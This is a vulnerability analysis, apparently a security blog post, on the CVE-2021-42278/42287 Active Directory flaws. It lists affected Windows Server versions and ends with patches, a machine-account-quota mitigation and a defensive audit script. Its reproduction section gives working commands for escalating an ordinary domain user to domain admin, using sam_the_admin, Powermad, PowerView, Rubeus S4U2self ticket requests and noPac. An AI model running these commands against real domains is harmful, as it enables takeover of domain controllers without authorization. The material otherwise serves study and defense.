CVE-2021-42278/42287 (Domain Controller) Vulnerability Analysis and Exploitation

0x00 Vulnerability Overview

On November 9, 2021, overseas researchers published on Twitter two Active Directory related CVEs, CVE-2021-42278 & CVE-2021-42287. Used in combination, the two vulnerabilities allow an ordinary domain user to escalate to domain admin privileges.

  • CVE-2021-42278: a machine account's name should normally end with $, but AD did not validate the names of machine accounts in the domain.
  • CVE-2021-42287, used together with CVE-2021-42278: create a machine account with the same name as the domain controller's machine account (without the trailing $), request a TGT for that account, rename the account, and then request a TGS ticket via S4U2self. In the TGS_REP stage the DC cannot find the account named in the TGT (it no longer exists), so it falls back to looking the name up with a $ appended and thereby resolves the DC's own machine account; it then encrypts the TGS ticket with its own key and supplies a PAC belonging to that account, and we obtain a high-privilege ST.

0x01 Affected Versions

  • CVE-2021-42287

    Windows Server 2012 R2 (Server Core installation)
    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
    Windows Server 2012
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2022
    Windows Server 2019 (Server Core installation)
    Windows Server 2019
  • CVE-2021-42278

    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2012
    Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2019 (Server Core installation)
    Windows Server 2022
    Windows Server 2019
    Windows Server 2012 R2 (Server Core installation)

0x02 Reproduction

Lab environment

  • Domain controller

    Domain: testvul.com
    Account: administrator
    Password: test123!
    Computer name: WIN-6A1HJFP87NE


  • Ordinary domain account

    Account: testexp
    Password: Exp@123


  • Attacker machine

    Kali Linux
    IP: 192.168.12.3
    Exploit script: https://github.com/WazeHell/sam-the-admin
    Impacket v0.9.24

One-click exploit

Python exploit script: https://github.com/WazeHell/sam-the-admin

Prerequisite: one domain user account.

Usage:

python3 sam_the_admin.py "testvul/testexp:Exp@123" -dc-ip 192.168.12.2 -shell


Simple and brutal: a single domain user account is enough to take control of the DC.

In-depth analysis of the exploit

The concrete steps:

  1. First create a machine account, using impacket's addcomputer.py or Powermad.

    addcomputer.py creates the machine account over the SAMR protocol; a machine account created this way has no SPN, so the SPN does not need to be cleared.

  2. Clear the machine account's servicePrincipalName attribute.

  3. Change the machine account's sAMAccountName to the DC's machine account name; note that the trailing $ is omitted.

  4. Request a TGT for the machine account.

  5. Change the machine account's sAMAccountName to some other name; anything that differs from the name used in step 3 will do.

  6. Request an ST from the DC via the S4U2self protocol.

  7. Perform a DCSync attack.

Ordinary domain account

1. First, the testexp user is an ordinary domain user:


Creating the machine account

2. Create a new machine account with powermad.ps1 (by default a domain user may create 10 machine accounts).

Download: https://github.com/Kevin-Robertson/Powermad

Command syntax:

powershell Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\Powermad.ps1

# After running this you will be prompted for a password: whoami (any password works)
New-MachineAccount -MachineAccount saulgoodman -Domain testvul.com -DomainController WIN-6A1HJFP87NE.testvul.com -Verbose

# Verify that the account was added
net group "domain computers" /domain


Clearing the SPNs

3. Clear its SPNs

# Import PowerView.ps1
Import-Module .\PowerView.ps1

Set-DomainObject "CN=saulgoodman,CN=Computers,DC=testvul,DC=com" -Clear 'serviceprincipalname' -Verbose


Resetting the computer name

4. Reset the computer name

Set-MachineAccountAttribute -MachineAccount saulgoodman -Value "WIN-6A1HJFP87NE" -Attribute samaccountname -Verbose


Requesting the TGT

5. Request a TGT

Rubeus: https://github.com/GhostPack/Rubeus

./Rubeus.exe asktgt /user:WIN-6A1HJFP87NE /password:whoami /domain:testvul.com /dc:WIN-6A1HJFP87NE.testvul.com /nowrap


Restoring the attribute

6. Change the machine account's sAMAccountName (back to the original, or to anything else)

Set-MachineAccountAttribute -MachineAccount saulgoodman -Value "saulgoodman1" -Attribute samaccountname -Verbose


Obtaining the ticket

7. Request S4U2self (obtain the ticket)

./Rubeus.exe s4u /self /impersonateuser:"Administrator" /altservice:"ldap/WIN-6A1HJFP87NE.testvul.com" /dc:"WIN-6A1HJFP87NE.testvul.com" /ptt /ticket:<base64 TGT from step 5>


Exploitation with noPac

Tool: https://github.com/cube0x0/noPac (requires .NET 4.0+)

Verification

1. Scan for the vulnerability:

.\noPac.exe scan -domain testvul.com -user testexp -pass 'Exp@123'


Exploitation

2. Exploit:

./noPac.exe -domain testvul.com -user testexp -pass 'Exp@123' /dc WIN-6A1HJFP87NE.testvul.com /mAccount saulgoodman /mPassword passW0rd /service cifs /ptt

0x03 Remediation

  1. Microsoft has released patches: KB5008602 and KB5008380.
  2. Use the ADSI Edit tool on the domain controller to set the domain's MAQ (ms-DS-MachineAccountQuota) to 0, which breaks the exploit chain at its first step (creating the machine account).
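As an added defensive example (not from the original post or any of the tools it references), the following PowerShell audits the conditions the chain in the analysis section relies on and applies the MAQ mitigation from this section without the ADSI Edit GUI. It assumes the RSAT ActiveDirectory module, rights to read and modify the domain object, and that account-management auditing writes 4742 events to the DC's Security log.

```powershell
# Added defensive example: audit the preconditions of the CVE-2021-42278/42287 chain
# and apply the MAQ mitigation. Assumes RSAT ActiveDirectory module and domain-admin rights.
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName

# 1. Machine account quota: any non-zero value lets ordinary users create machine accounts (step 1).
$maq = (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Host "ms-DS-MachineAccountQuota = $maq"

# 2. CVE-2021-42278 condition: computer objects whose sAMAccountName does not end in '$'.
$suspicious = Get-ADComputer -Filter * -Properties sAMAccountName, whenChanged |
    Where-Object { $_.sAMAccountName -notlike '*$' }
$suspicious | Select-Object Name, sAMAccountName, whenChanged | Format-Table -AutoSize

# 3. Collision with a DC name: a computer object named like a DC without the '$'
#    is exactly the state the chain reaches in step 3.
$dcNames = (Get-ADDomainController -Filter *).Name
$suspicious | Where-Object { $dcNames -contains $_.sAMAccountName } |
    Select-Object Name, sAMAccountName, DistinguishedName

# 4. Security log: 4742 "computer account was changed" events in which SamAccountName was
#    rewritten (steps 3 and 5 each produce one). Unchanged fields are logged as '-'.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4742 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $data = $x.Event.EventData.Data
        $newSam = ($data | Where-Object { $_.Name -eq 'SamAccountName' }).'#text'
        if ($newSam -and $newSam -ne '-') {
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Target = ($data | Where-Object { $_.Name -eq 'TargetUserName' }).'#text'
                NewSam = $newSam
            }
        }
    }

# 5. Mitigation from section 0x03: set MAQ to 0 (same change the post makes via ADSI Edit).
Set-ADDomain -Identity $domainDN -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
```

Setting MAQ to 0 only prevents new machine accounts from unprivileged users; accounts that already exist, and delegated rights to create computer objects, still need the patches from item 1.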